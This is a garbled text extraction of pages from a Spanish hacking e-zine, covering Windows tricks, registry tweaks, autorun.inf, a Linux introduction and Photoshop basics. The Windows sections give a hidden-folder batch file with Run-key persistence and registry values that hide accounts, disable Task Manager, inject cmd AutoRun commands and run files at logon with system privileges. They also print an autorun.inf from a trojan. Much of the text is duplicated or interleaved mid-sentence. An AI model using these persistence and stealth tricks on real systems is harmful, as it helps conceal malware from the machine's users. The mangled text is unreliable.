Virtualdrive.bat Virtualdrive.bat Cd\ Nos ubicamos en el directorio Raiz Cd\ Nos ubicamos en el directorio Raiz

Md Hacking Creamos la carpeta hacking Md Hacking Creamos la carpeta hacking

Attrib +h +r +s c:\hacking Ponemos atributos especiales a la carpeta hacking Attrib +h +r +s c:\hacking Ponemos atributos especiales a la carpeta hacking

Subst Z: c:\hacking Creamos la Unidad virtual Subst Z: c:\hacking Creamos la Unidad virtual

Luego modificamos esta clave: Luego modificamos esta clave:

HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run valor alfanumérico con el nombre del programa (en este caso Virtualdrive.bat) como valor y la ruta donde hemos alojado el programa como la información del valor. Esto hara que cada vez que iniciemos, se ejecute el bat, y por ende tener siempre disponible nuestra unidad virtual.

HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run valor alfanumérico con el nombre del programa (en este caso Virtualdrive.bat) como valor y la ruta donde hemos alojado el programa como la información del valor. Esto hara que cada vez que iniciemos, se ejecute el bat, y por ende tener siempre disponible nuestra unidad virtual.

Page 42: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Variables de le sistema Windows maneja unas variables, tales como son: el nombre del equipo, directorio del sistema, sistema operativo…, el truco es este

Infosistema.bat set>c:\informacion.txt

sisteminfo>>c:\información.txt

net view >>c:\información.txt

ipconfig all>>c:\informacion.txt

type c:\informacion.txt |more

Existen muchos comandos que podríamos implementar para obtener información, De esta forma en el directorio raíz tendremos un archivo llamado información.txt que contendrá información valiosa sobre el computador.

Programas especiales En Windows existen una serie archivos (que a la vez son programas) que nos sirven para realizar tareas, tanto de configuración, recuperación, o administración, accesibilidad, y muchas cosas mas, por lo general, nosotros los usamos accediendo desde los accesos directos, pero todos ellos son archivos ejecutables, en la mayoría de los casos.

Ejemplos palpables de ello son los muy usados archivos mmc.exe, msconfig.exe, gpedit.msc, charmap.exe, y por nombrar solo unos pocos y su carpeta de origen casi siempre es: C:\windows\system32

Otra de las cosas importantes de Windows es su sistema de búsqueda, permitiéndonos hacer búsquedas complejas pero a la vez con un criterio fácil de seguir, por ejemplo, podemos buscar imágenes solamente, archivos ocultos y del sistema, con un criterio de fecha en particular, en fin es fácil de usar, solo hay que ser un poco intuitivo, de más esta decir es una herramienta imprescindible, otra cosa importante es el uso de los comodines -> “*” “?”, el asterisco remplaza una letra o varias letras de la búsqueda, por decir queremos encontrar solo los archivos ejecutables del sistema, vamos a inicio->ejecutar-> allí escribimos c:\windows\system32 y seleccionamos la opción buscar:

Escogemos la opción todos los archivos

Page 43: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Y allí definimos la búsqueda de la siguiente manera *.exe o *.msc o ????pad.exe , en fin…

Otro programa que me fascina y me ha salvado de muchas es el rstrui.exe en otras palabras Restaurar Sistema, ubicada en la carpeta: C:\WINDOWS\system32\Restore este programa es el encargado de restaurar el sistema a un punto de previo de control

Otra herramienta que tenemos que aprender a usar constantemente es: El Administrador de Tareas, taskmgr.exe, Esta si que es importante para el manejo eficiente de los recursos, desde allí podemos ver procesos, matar procesos, ver las aplicaciones en uso, analizar el uso de la red y del procesador, todas ellas tareítas que son muy importantes estar checando regularmente. Para acceder a ella podemos hacerlo asi: Ctrl + Alt + Supr, también escribiendo taskmgr en la ventana ejecutar, o haciendo clic derecho sobre la barra de tareas

Claro que el manejo de esta herramienta necesita un apartado especial y solo hago una referencia no mas, en otro capitulo aprenderemos a usarlo eficientemente. Por el momento eso es todo amigos, espero les hayan gustado el articulo.

Page 44: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

El Registro de Windows XP By Alesteir

Este documento explica, lo que es el registro y la forma de manipularlo y por ello hacer lo se nos antoje con el SO Windows XP, (En próximos números del zine, explicaremos como hacerlo con otras versiones del Windows)

nos antoje con el SO Windows XP, (En próximos números del zine, explicaremos como hacerlo con otras versiones del Windows)

Primero que todo debemos saber que el registro de Windows es una gran base de datos que contiene datos sobre los programas instalados en el PC y sus respectivas opciones de configuración. Allí se almacena la información de cada uno de los dispositivos instalados en el computador. Toda esta información se encuentra estructurada de una manera jerárquica, similar a la estructura de directorios y archivos. Para modificarlo existe varias maneras de hacerlo, la mas sencilla y común es desde el editor de registro (regedit). El registro es uno de los puntos críticos del sistema operativo windows, por ello es necesario conocer su funcionamiento y la forma en que lo podemos manipular o modificar. También cabe decir que debemos tener cuidado don lo que hagamos con el ya que podríamos dañar totalmente el sistema operativo, por eso antes de manipular cualquier cosa del registro, yo recomiendo hacer un backup,, como lo hacemos?, sencillo vamos al menú inicio ejecutar regedit Exportar y ubicamos el archivo resultante en un lugar de fácil acceso. Podemos guardar una parte (rama) o todo el registro, para ello nos posicionamos sobre la rama que deseamos guardar, es el caso de la imagen: MI PC , lo guardaría todo. Los archivos del registro llevan la extensión .reg y si hacemos click sobre ellos copian al registro toda la información contenida en su interior.

Primero que todo debemos saber que el registro de Windows es una gran base de datos que contiene datos sobre los programas instalados en el PC y sus respectivas opciones de configuración. Allí se almacena la información de cada uno de los dispositivos instalados en el computador. Toda esta información se encuentra estructurada de una manera jerárquica, similar a la estructura de directorios y archivos. Para modificarlo existe varias maneras de hacerlo, la mas sencilla y común es desde el editor de registro (regedit). El registro es uno de los puntos críticos del sistema operativo windows, por ello es necesario conocer su funcionamiento y la forma en que lo podemos manipular o modificar. También cabe decir que debemos tener cuidado don lo que hagamos con el ya que podríamos dañar totalmente el sistema operativo, por eso antes de manipular cualquier cosa del registro, yo recomiendo hacer un backup,, como lo hacemos?, sencillo vamos al menú inicio ejecutar regedit Exportar y ubicamos el archivo resultante en un lugar de fácil acceso. Podemos guardar una parte (rama) o todo el registro, para ello nos posicionamos sobre la rama que deseamos guardar, es el caso de la imagen: MI PC , lo guardaría todo. Los archivos del registro llevan la extensión .reg y si hacemos click sobre ellos copian al registro toda la información contenida en su interior.

Toda la información del registro esta estructurada de manera jerárquica, de la misma forma en que están estructura dos los directorios y archivos del sistema operativo. Clave es el nombre que se la da las carpetas, a su vez cada clave tiene muchas subclaves y así sucesivamente, hasta llegar al valor en específico, de

igual forma cada valor tiene un nombre; y guarda algun tipo de valor información

Las Claves 1. HKEY_CLASES_ROOT: Contiene la información sobre las programas y la forma en que se encuentran asociados con las extensiones del S.O.

2. HKEY_CURRENT_USER: Contiene la información de cada programa como pueden ser:, traducciones, sonidos, también contiene toda la información sobre el panel de control, las conexiones a Internet y sus respectivos nombres, los últimos programas y archivos utilizados, direcciones de correo electrónico y un largo etc. También están almacenados los nombres de los directorios y archivos necesarios para ejecutar cualquier aplicación.

3. HKEY_LOCAL_MACHINE: En esta clave encontramos Información sobre los controladores necesarios y los utilizados, el tipo de hardware usado o reconocido, también contiene la información sobre los puertos.

4. HKEY_USER: Aquí esta dodo lo relativo a los datos sobre cada usuario. Cada vez que un usuario diferente utiliza el PC, sus configuraciones se guardan en esta clave.

5 .HKEY_CURRENT_CONFIG: Aquí encontramos los datos de los Plug-ins utilizados por los programas, contiene todos lo nombres y especificaciones de cada uno de los periféricos.

En la próxima entrega vernos mas sobre el registro y la forma en que lo manejamos, por el momento voy a dejar una recopilación de los valores que nos pueden ayudar en cuanto a hack se refiere.

Page 45: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

Valores del registro “hackeables” Esta es un recopilación de valores que nos pueden ayudar enormemente, es obvio que es solo para los mas avanzados en este tema, cuidado!, ya os he advertido (Mucho ojo al manipular el registro)

Sustituir la pantalla de bienvenida

HKEY_LOCAL_MACHINE\-Software\Microsoft\Windows NT\CurrentVersion\Winlogon valor alfanumérico GinaDLL El contenido será el nombre de la librería que se usa por defecto y es: «msgina.dll Especificar archivos ejecutados por Winlogon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon valor alfanumérico ex System, cuyo contenido tendrá la ruta de los archivos que se ejecutarán al inicio de sesión con privilegios de sistema. Excluir un programa de Inicio

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation valor alfanumérico AddRemoveApps, contiene los nombres de los ejecutables, de los programas que no deseamos en el menú de Inicio, seguido de un punto y coma «;» Cerramos sesión! Pulsar «Ctrl+Alt+Supr» para iniciar la sesión HKEY_LOCAL_MACHINE\-SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon valor DWORD DisableCAD «0» activa , «1» desactiva Ocultar el reloj de la Barra de tareas HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer valor DWORD HideClock, «0» muestra el reloj o «1» lo oculta. Esconder cuentas de usuario de la pantalla de bienvenida HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList valor DWORD cuyo contenido será el nombre de usuario y su contenido «0», reiniciamos! Cuenta de administrador en la pantalla de bienvenida HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList valor DWORD, su nombre será «administrador, el contenido será «1» activa «0» desactiva reiniciamos! Incluir Comandos al inicio del Interprete de Comandos Shell D.O.S. HKEY_CURRENT_USER \software\microsoft\Command Processor valor DWORD Autorun su contenido sera la ruta y el nombre del programa, o el comando DOS que se ejecutara al cargar el cmd.exe ( interprete de comandos<->Shell) se pueden introducir varios valores, solo es cuestión de separarlos por "&&" (Sin Comillas) prompt $d $t $p Listo! $_ && SYSTEMINFO >C:\INFO.TXT". Deshabilitar el interprete de comandos del D.O.S. H HKEY_CURRENT_USER \software\policies\microsoft\windows\system valor Alfanumerico DisableCMD “0” deshabilita “1” habilita la shell Desactiva la opcion de agregar o quitar programas del Panel de control HKEY_CURRENT_USER \software\microsoft\windows\CurrentVersion\Policies\Uninstall valor Alfanumerico NoAddRemovePrograms 0 desactiva 1 activa Deshabilitar el Administrador de tareas HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\policies\system valor Alfanumerico disabletaskmgr 0 deshabilita 1 habilita el administrator de tareas. Habilitar opción de Borrar la lista de documentos recientes HKEY_CURRENT_USER \software\\microsoft\windows\CurrentVersion\policies\explorer valor Alfanumerico ClearRecentDocsOnExit 00,00,00,00 deshabilita y 01,00,00,00 habilita

Page 46: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición El Registro de Windows XP

Varios claves para optimizar el Windows !!!

En esta parte voy a poner una serie de claves que optimizan eficientemente nuestro sistema, las podemos guardar como un archivo bat y ejecutarlas todas de una o simplemente mofificar la clave que deseemos!

OPTsystem.bat By Me pruébenlo y me dicen! ;) reg add "HKCU\Control Panel\Desktop\ /v WaitToKillAppTimeOut" /d 4000 /f reg add "HKLM\system\CurrentControlSet\control /v WaitToKillAppTimeOut" /d /4000 /f reg add "HKLM\system\CurrentControlSet\control /v WaitToKillServiceTimeout /d /4000 /f reg add "HKLM\system\CurrentControlSet\control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher /d 5 /f reg add "HKLM\software\microsoft\windows\CurrentVersion\explorer /v AlwaysUnloadDll" /d 1 /f Después de correr el bat vamos a la carperta prefetch y borremos todo los archivos allí ubicados y reiniciamos

Ootro truquito para aligerar el cierre y apertura de Windows es: ubicados dentro el editor del y posicionados sobre la clave principal MI PC y en el menú edición (o CTRL+B) escribimos la palabra kill, esto nos mostrara claves tales como waitotkill… o algo por el estilo, cambiamos el contenido por defecto del valor que es 20000 por 4000 oprimimos f3 y hacemos lo mismo con todas las claves que empiecen waittokill… y listo reiniciamos de nuevo para ver esos cambios (con coronometro en mano), asi como estas cosas hyay una cantidad de cosas que puerden ser utilizadas para una mejor untilizacion de los procesos, servicios y casi todo lo referente a este criticado pero genial sistema operativo.

Eso es todo en cuanto al registro por esta ocasión espero que lo estudien y aprendan toda la potencialidad que nos da manipular el registro de Windows, suerte a todos!

Page 47: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Función Autorun

Función Autorun Editorial

Autorun.inf es un archivo asociado a una función interna Autorun (Funciona elementalmente bajo Windows y corre sobre otros sistemas operativos) cuya principal finalidad es ejecutar una secuencia de comandos o parámetros que son ejecutados por el sistema operativo línea por línea, pudiendo: cambiar el icono de la unidad que lo contiene,

asociada para el, además de que puede añadir comandos adicionales al menú emergente que aparece cuando hacemos doble clic a la unidad en particular. Cada vez que una unidad es detectada, el sistema operativo registra en busca de la existencia de el archivo Autorun.inf (El archivo debe estar ubicado siempre en el directorio raíz). si lo encuentra ejecuta la secuencia de parámetros internos del autoejecutable; si no encuentra el archivo el S.O. se refiere al nuevo disco por su nombre por defecto y ejecuta las acciones asociadas y predefinidas con la función Autorun, tal como mostrar el menú emergente, etc; a mi me recuerda al viejo y aun utilizado autoexec.bat (en cuanto a su característica básica y principal -ejecutarse automáticamente-), aquellos que lo han usado saben de que les hablo.

correr un ejecutable, abrir un archivo con la aplicación

Resumiendo un poco, la función Autorun define lo siguiente:

El proceso o la aplicación que se ejecutara automáticamente cuando una nueva unidad es detectada.

Opcionalmente se puede definir que corra sobre un determinado ambiente operativo.

Un icono que será visualizado en el Explorador de archivos o en Mi PC representara a la unidad en particular.

Una Ventana emergente O Menú de opciones desplegado cuando hacemos clic derecho sobre la unidad.

La función de auto arranque funciona con cualquier unidad de disco: CD, DVD, dispositivos de almacenamiento vía USB, Discos duros, y Unidades Zip, que contenga un archivo autorun.inf ubicado siempre en el directorio raíz, cabe recalcar que por defecto esta función esta desactivada para unidades que no sea CD-ROM1.

Como lo creamos? lemente abrimos editor de texto plano como wordpad o el bloc de notas -->inicio--

Es muy fácil, simp>ejecutar notepad.exe1y simplemente definimos los parámetros que comandos que se adapten a nuestras necesidades, lo guardamos en la unidad (USB, CD-RW, DVD-RW, Discos locales, etc) como Autorun.inf , si no sabemos usar los CDs regrabables, pues preparamos todo el paquete (Tal como un rootkit) en una carpeta a la mano y quemamos todo en un cd, teniendo muy en cuenta las rutas que usaras o simplemente grabando todo en el directorio raíz. Yo uso mucho esta función , para crear Cds bien sea: totalmente autónomos, o que interactúen con el usuario (Especial para Tutoriales o Programas)

Page 48: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Función Autorun

Parámetros o Comandos:

Parametro Sintaxis Ejemplo

Icon icon=[ruta\]nombreicono[,index] icon=ejecutable.exe,1 ; icon=1.ico

Label -Etiqueta

label=NombreUnidad label=CUH e-Zine

Open-Abrir open=[ruta\]ejecutable [param1 [param2] ...] open=AutoArranque.exe

Shellexecute shellexecute=[filepath\]filename[param1,[param2]...] shellexecute=Escanear.exe

Shell\verb shell\verb\command=NombreArchivo.exe shell\install\command=startinstalar.exe

Shell shell\verb=TextoMenu shell\uninstall = &Desinstalar2

Menú Emergente

Page 49: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Función Autorun

Ejemplos de cómo hacer un autorun.inf

CUH e-Zine Sample Soundmix- Troyano Agent32

[ Autorun] open=

Label=CUH e-Zine shell\open=´ò¿ª(&O)

icon=icono.ico shell\open\Command=RECYCLER\autorun.exe -OpenCurDir

open=autorun.exe shell\open\Default=1

action=Escanear dispositivo shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)

shellexecute=escanear.exe shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir

shell\comprobar=&Comprobar Troyano wscript

shell\ Comprobar\Command=comprobar.exe autorun·ç±©

shell\install = &Instalar [autorun]

shell\install\command = start Instalar.exe open=

shell\uninstall = &Desinstalar3

shell\open=´ò¿ª(&O)

shell\uninstall\command = start Desinstalar.exe shell\open\Command=WScript.exe .\autorun.vbs

shell\readme = &Leeme shell\open\Default=1

shell\readme\command =start notepad readme.txt shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)

shell\help = &Help shell\help\command = start shell\explore\Command=WScript.exe .\autorun.vbs

ayuda.hlp

Mas informacion:

http://www.fermu.com/content/view/356/26/lang,es/

http://mundogeek.net/archivos/2006/04/10/dispositivos-usb-y-autoruninf/

Page 50: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición GNU - LINUX

GNU/Linux by LTSmash

¿Que es Linux? Hola amigos. Hay una cosa en el mundo que muchos ignoran, y eso es la existencia de alternativas a Microsoft. Microsoft es una empresa dedicada a la informática pero esto no implica que sea una empresa buena ni decente; sin embargo hay un producto suyo que esta presente en la mayoría de los ordenadores del mundo, y se llama WINDOWS. Windows es el “Sistema operativo” (hay quienes dicen que no cumple los requisitos para ser catalogado como tal) mas usado en el mundo, y actualmente la mayoría de las personas que manejan un ordenador por consecuencia trabajan con el mismo. Hay otros sistemas como MacOS de Apple, BSD el UNIX libre, Solaris de Sun Micro; incluso algunos otros sistemas ya muertos (OS/2 de IBM, DR-DOS de Digital Research, MS-DOS de Microsoft y un largo etcétera), incluso sistemas mucho menos conocidos que los anteriores como son ReactOS (la implementación libre de Windows NT) y FreeDOS (una implementación libre de DOS). Sin embargo, no son otros sistemas los que nos interesan, sino el único y real, verdadero y tangible competidor de Windows: GNU/Linux. GNU/Linux es un sistema operativo de carácter libre, es decir, software que controla el funcionamiento apropiado del ordenador bajo una licencia permisiva donde se tiene acceso a varias libertades que con el software privativo seria imposible tener, como el código fuente (“source code” en ingles) que en esencia seria la “receta” del software, y la libertad de distribuirlo y usarlo como prefiramos (dentro de la normatividad de la licencia). En el caso de Linux (el kernel/núcleo que es el nivel de software que controla la interacción entre las aplicaciones y el hardware), se usa la licencia GPLv2 de la FSF (Free Software Fundation) que es la máxima casa del software libre fundada por Richard Stallman.

Bien, pero, ¿Cuáles son las características?

Linux es software Libre, es un clónico del sistema UNIX (aunque en realidad estaba basado primariamente en MINIX) y fue escrito quizá como un ejercicio/pasatiempo o simplemente para hacer un SO por su creador: Linus Torvalds.

¿Pero exactamente qué significa eso de Libre y qué ventajas tiene?

Significa lo que mencione con anterioridad. El software libre tiene básicamente cuatro puntos/libertades que lo definen como tal: Ejecutar el programa con cualquier propósito (privado, educativo, público, comercial, militar, etc.) Eso incluye la posibilidad de usarlo para aventar una bomba nuclear al pentágono y no es una broma. Estudiar y modificar el programa (para lo cual es necesario poder acceder al código fuente) Asi que tenemos acceso a la receta del software y podemos usarla para mejorar nuestra habilidad “programando” (haciendo recetas de software). Copiar el programa de manera que se pueda ayudar al vecino o a cualquiera Asi es, si queremos se lo copiamos a todo el mundo y no será esto ilegal, ¡NO MAS WAREZ! Mejorar el programa y publicar las mejoras Colaboramos con la comunidad si así lo deseamos, de esta forma el software libre esta en continuo desarrollo y es por ello que es un modelo progresista.

Page 51: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición GNU - LINUX Pero entonces por qué este genial sistema operativo ¿

no es ya líder mundial?

nux es software, y no hay detrás de Linux una empresa

¿Cómo se distribuye Linux?

particularmente en lo que

¿Cómo se "estructura" Linux? ente LINUX, es el kernel o

os “daemons”. Un demonio,

LiMONOPOLICA (léase Microsoft) que haga FUD (FUD, del inglés, Fear, Uncertainty and Doubt, «miedo, incertidumbre y duda» es una expresión con la que se califica a una determinada estrategia comercial consistente en diseminar información negativa, vaga o sesgada con el objeto de perjudicar a un competidor, después de 1991 el término se ha generalizado para referirse a cualquier clase de desinformación usada como un arma competitiva.) y marketing por el, así que el poder de la publicidad puede mas que el de la comunidad hasta ahora. Sin embargo, hay una gran cantidad de empresas que viven del software libre (si, así es, ya sea dando soporte, desarrollando mas software como RedHat, Novell, Linspire, etc.; o incluso vendiendo Cds, pendrives y DVDs con SL) y ayudan mucho a probar que el software libre y Linux son rentables y con esto su difusión se incrementa.

Linux se distribuye además llamamos “distribuciones” o distros, que no son sino compilaciones de software para tener un sistema operativo completo y funcionar, lo normal es que incluyan un sistema grafico (GUI, es lo que vemos en la pantalla como nuestro escritorio y los iconos), suites de ofimática completas (como OpenOffice.org), aplicaciones multimedia (reproductores de video y audio), incluso juegos. Las distros se clasifican ya sea dentro de lo general y lo especifico/especializado, es decir, distros que son hechas para que cualquiera las use o distros que están hechas para que, por ejemplo, se adapten a las necesidades de un músico (el caso de Musix). Hay cuatro distros actuales de donde surge la mayoría de

las demás: Slackware (la mas antigua con vida), Debian (padre de la mas usada que es Ubuntu), RedHat (la distro empresarial y comercial mas usada) y Gentoo (una metadistro, es decir, se reparte no de forma binaria/lenguaje-entendible-para-la-PC sino en modo de código fuente listo para ser traducido a código maquina). Hay miles de distros, y quizá sea muy difícil entrar a escoger una así que quizá quieras probar con algo como Ubuntu, la distro mas popular del momento y que es muy usada por ser simple y eficiente.

Linux, lo que se llama principalmnúcleo, y de ahí se gestiona la comunicación entre software y hardware. Linux trabaja en cuestión algo diferente con lo que es el kernel, ya que el kernel puede incluir en si mismo los controladores o llamarlos externamente. Linux entonces tiene un excelente reconocimiento de software en las distros binarias ya que están hechas para que tenga soporte con varios tipos de hardware. Así mismo, si lo preferimos, podemos compilar un kernel a la medida que solo soporte el hardware que le indiquemos y que este optimizado para nuestra maquina, de modo que solo trabaje en ella y aumentando el rendimiento. Linux tiene lo que llamamdaemon ó dæmon es un tipo especial de proceso informático que se ejecuta en segundo plano en vez de ser controlado directamente por el usuario (es un proceso no interactivo).Así pues, nuestro sistema trabaja con varios de estos y trabajara con mas según se le indique que así sea, facilitando cosas como el ser multiusuario (podemos configurar nuestro equipo para acceder desde otro sin la intervención de otro usuario, ni interrumpirle), podemos ordenarle que ejecute determinadas tareas cuando se le pida, etc.

¿Y que tal luce Linux?

Linux luce como tú quieras que luzca. En términos generales, en un sistema Linux es muy común encontrar tres entornos de

escritorio (Un entorno de escritorio, en inglés Desktop Environment es un conjunto de software para ofrecer al usuario de un ordenador un ambiente amigable y cómodo y es una solución completa de interfaz grafica de usuario o GUI, ofrece iconos, barras de herramientas, programas e integración entre aplicaciones con habilidades como, arrastrar y soltar.) principales, que son KDE, GNOME y XFCE.

Page 52: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición GNU - LINUX

KDE GNOME Xfce

Y eso no es todo, no, por que podemos añadir widgets que son mini aplicaciones que se agregan a nuestro escritorio, como relojes y verificador de recursos del sistema en uso; incluso disponemos de Beryl y su nueva fusión con Compiz que es Compiz-Fusion que da efectos superiores a los de cualquier otro S.O.:

Compiz-Fusion

¿Y la seguridad? ¿Que tan seguro es GNU/Linux?

La gente con el paso del tiempo se ha acostumbrado a constantes fallos, a que un ordenador sea vulnerable a virus, que no sea estable, que haya que reiniciar para actualizarse y que esto no nos de ningún beneficio, que la PC se ralentice con el tiempo, incluso al instalar un programa, acostumbrados a usar un antivirus y un antispyware que desgraciadamente no les protege del todo pero que les cuesta dinero y recursos del sistema. Están acostumbrados a la poca madurez del software. Linux no puede cumplir con las expectativas, lamentablemente, ya que es un sistema muy estable, flexible y bien probado, que progresa con el tiempo: Linux no se ralentiza con el tiempo, Linux no necesita reiniciar para

actualizarse (con la excepción del Kernel), Linux no necesita actualizar cada programa manualmente, Linux no necesita antivirus ni antispyware. Linux es tan potente, que se le puede dar cualquier uso, desde un escritorio hogareño, pasando por centro multimedia hasta servidor web; INCLUSO SE USA EN HOLLYWOOD PARA LA EDICION DE PELICULAS. Concluyendo... Linux es la solución viable para liberarnos de un monopolio, de sus restricciones, de que se nos manipule. Debemos detener al monstruo y ser libres. Tenemos las herramientas, ¡HAGAMOSLO!

Page 53: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición GNU - LINUX

Por LTSmash  

 GNU 

Los  sistemas  GNU  Linux  son  utilizados  en muchos lugares, que van desde los escritorios hasta  sistemas  de  misión  critica  en  grandes empresas y/o instancias gubernamentales  Linux  te  da  la    libertad  no  como  gratuidad. Dicha  libertad  se  refiere  a  que  podemos correr, leer y escribir el software. Esto es, que  cuando  obtienes  un  programa,  no  solo obtienes  el  binario,  sino  que  también  puedes obtener el código fuente, el cual puedes leer, modificar  e  incluso  distribuir  sin  ningún problema legal.  

 LINUX es un sistema operativo, compatible con  Unix.  Dos  características  muy  peculiares  lo diferencian  del  resto  de  los  sistemas  que podemos  encontrar  en  el  mercado,  la  primera, es que es libre, esto significa que no tenemos que  pagar  ningún  tipo  de  licencia  a  ninguna casa desarrolladora de software por el uso del mismo,  la  segunda,  es  que  el  sistema  viene acompañado  del  código  fuente.  El  sistema  lo forman  el  núcleo  del  sistema  (kernel)  mas  un gran numero de programas / librerías que hacen posible su utilización.  

‐‐‐‐‐ o ‐‐‐‐  Linus  Torvalds,  la  persona  de  la  que  empezó todo  este proyecto, en el año 1991, por aquel entonces, el era un estudiante de informática de  la  Universidad  de  Helsinki,  todo  empezó como  una  obsesión  personal  el  fue  el  que 

programó la mayoría de de las líneas de código del  kernell  este  genial  y  eficaz  sistema operativo llamado LINUX.  Primer  mensaje  que  Linus  Torvalds  mando  al grupo de noticias comp.os.minix:  From:[email protected]  (Linus Benedict Torvalds) Newsgroup: comp.os.minix Subject: GCC‐1.40 and a posix question Message‐ID:  1991Jul13, [email protected] Date: 3 Jul 91 10:00:50 GMT 

Nota Editorial

Page 54: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Usando el Photoshop e Imageready By Alesteir

En esta sección DISEÑO GRAFICO por el momento vamos a trabajar con un programa(en realidad son dos)) en particular su nombre es Photoshop (maneja diseños estáticos) e Imageready (manejo de animaciones) para los que manejáis este programa , pues esta articulo puede parecer uno mas, pero lo que se intenta es introducir a principiantes pero también incluimos buenos trucos para usuarios intermedios y avanzados, como esta es la primera edición del zine, empezaremos con los conceptos básicos, componentes mas utilizados, atajos de teclado (shortcuts) , configuración, y muchos trucos que nos ayudara a efectuar nuestros diseños de una forma mas eficiente y rápida (Incluso aumentando nuestra competitividad laboral, dado el hecho de que

nos desempeñamos en el diseño en general). Son pocos los calificativos que se le pueden dar a este genial programa, siendo usado en casi todos los rincones del mundo, a algunos tal vez se les dificulte al principio y tal vez terminen catalogándolo como un programa mas, pero no es así. Yo me puedo atrever a decir que photoshop es uno de los diez mejores programas informáticos de todos los tiempos, y es que a medida que uno va aprendiendo a manejar y a combinar todas las herramientas es cuando se da cuenta del potencial y versatilidad que posee. Bueno, no mas bla,bla,bla, y a lo que vinimos! (Para Windows solamente, esperamos implementarlo a Mac en próximas ediciones )

Instalar dos versionesPues para esta edición vamos a r una de las versiones básicas como es el Photohop 7.0, además de ser el que mas me gusta usar -claro que se pueden tener instaladas dos versiones en un mismo sistema operativo (Ver imagenes 1 y 2), si algunos lo saben pues… y si no pues…, empecemos con un truquito, si tienes instalado ya algún programa y quieres tener otra versión pues simplemente la instalas y a la hora de elegir la carpeta destino para los archivos cambias el nombre y la ubicación de la carpeta, pero recuerden que no podemos abrir las dos versiones del programa a la vez (aplicable a cualquier aplicacion).

Fig. 1

Fig. 2

Los primeros pasos Lo primero que debemos aprender: es saber abrir un nuevo archivo (Ctrl+N), veamos la figura de abajo, 1 nos indica que que abrimos un nuevo psd(Llamase al documento hecho en photoshop que preserva todas las características del diseño, como capas, estilos, etc), 2 el nombre del archivo, es mejor definirlo desde aquí, 3 este es el nombre predefinido para el documento, al seleccionar esta opción, nos sale un menú n con distintos

tamaños , dependiendo de nuestras necesidades, pero lo realmente practico es lo siguiente, existe la opción personalizar, una vez hayamos definido nuestras preferencias, podemos guardar todo asignándole un nombre y listo queda como un documento predeterminado, (supongamos que hacemos nuestra firma con las mismas características: 300x100 px, transparente, 72 ppi, etc.). 4 Indica el tipo de medida que vamos a manejar: Pixeles,

Page 55: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

pulgadas, cm, mm, etc. 5 Esto se refiere a la cantidad de pixeles por pulgada PPI de resolución del documento. 6 Aquí escogemos el modo de color del documento,

pudiendo ser: Mapa de bits, Escala de grises, Color RGB, etc. 7 En esta parte definimos el color del fondo: transparente, blanco, o color de fondo.

Componentes de Photoshop

Nuestro espacio de trabajo, esta compuesto por ventanas, barras de herramientas, menús y el panel de herramientas, por defecto se ubican las ventanas a la derecha de la pantalla, el panel de herramientas al izquierdo y las barras en la parte superior (Horizontales); algunas veces vamos a necesitar tener nuestro espacio de trabajo libre de ventanas,(en photoshop podemos hacer las cosas de distintas maneras: 1. Accediendo a los menús 2. usando los atajos de teclado, 3. desde las ventanas, claro que no todas las opciones están disponibles para ello, pero muchas si, por ejemplo para hacer un zoom, podemos usar Ctrl + + o ir a menú vista y seleccionar aumentar, otra es desde la ventana navegador ver Fig. 4, -

allí lo podemos hacer simplemente arrastrando la barra (1), o clicando sobre los triangulitos (2) )Una es, pulsando la tecla Tab (esconde todo), la otra es Shift + Tab (deja solo el panel), también hay un truquito, que os voy a enseñar, en el menú ventana, la primera opción nos permite definir un espacio adecuado a nuestras necesidades o a un tamaño en especifico, por ejemplo: para usar un diseño tipo banner necesitaremos poner las ventanas en la parte superior de forma que no nos estorbe al hacer un zoom ver Fig. 6, yo lo llamo 222 (Zoom al 222,55 %) ver Fig. 5, seleccionamos la opción guardar espacio de…

Page 56: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Fig. 5

Fig. 4

Fig.6

De igual forma photoshop permite personalizar muchas cosas, como son los menús, preferencias y incluso los atajos de teclado, para terminar este articulo, veremos algunos shortcuts mas usados, nos vemos en la próxima edición, (recuerden que para el próximo numero empieza lo bueno )espero que les sirva y lo disfruten, que en el fondo es lo mas importante! ;) Suerte a todos!!! By alesteir

Atajos de teclado (Shortcuts)

Page 57: CUH e-zine1ra Edicion

CUH e-zine vol #1 - 1ª edición Photoshop Desde Cero

Nuevo archivo --> Ctrl + N

Abrir --> Ctrl + O

Abrir como --> Ctrl + Alt + O

Pegar --> Ctrl + V

Cortar --> Ctrl + X

Copiar --> Ctrl + C

Combinar capas --> Ctrl + E

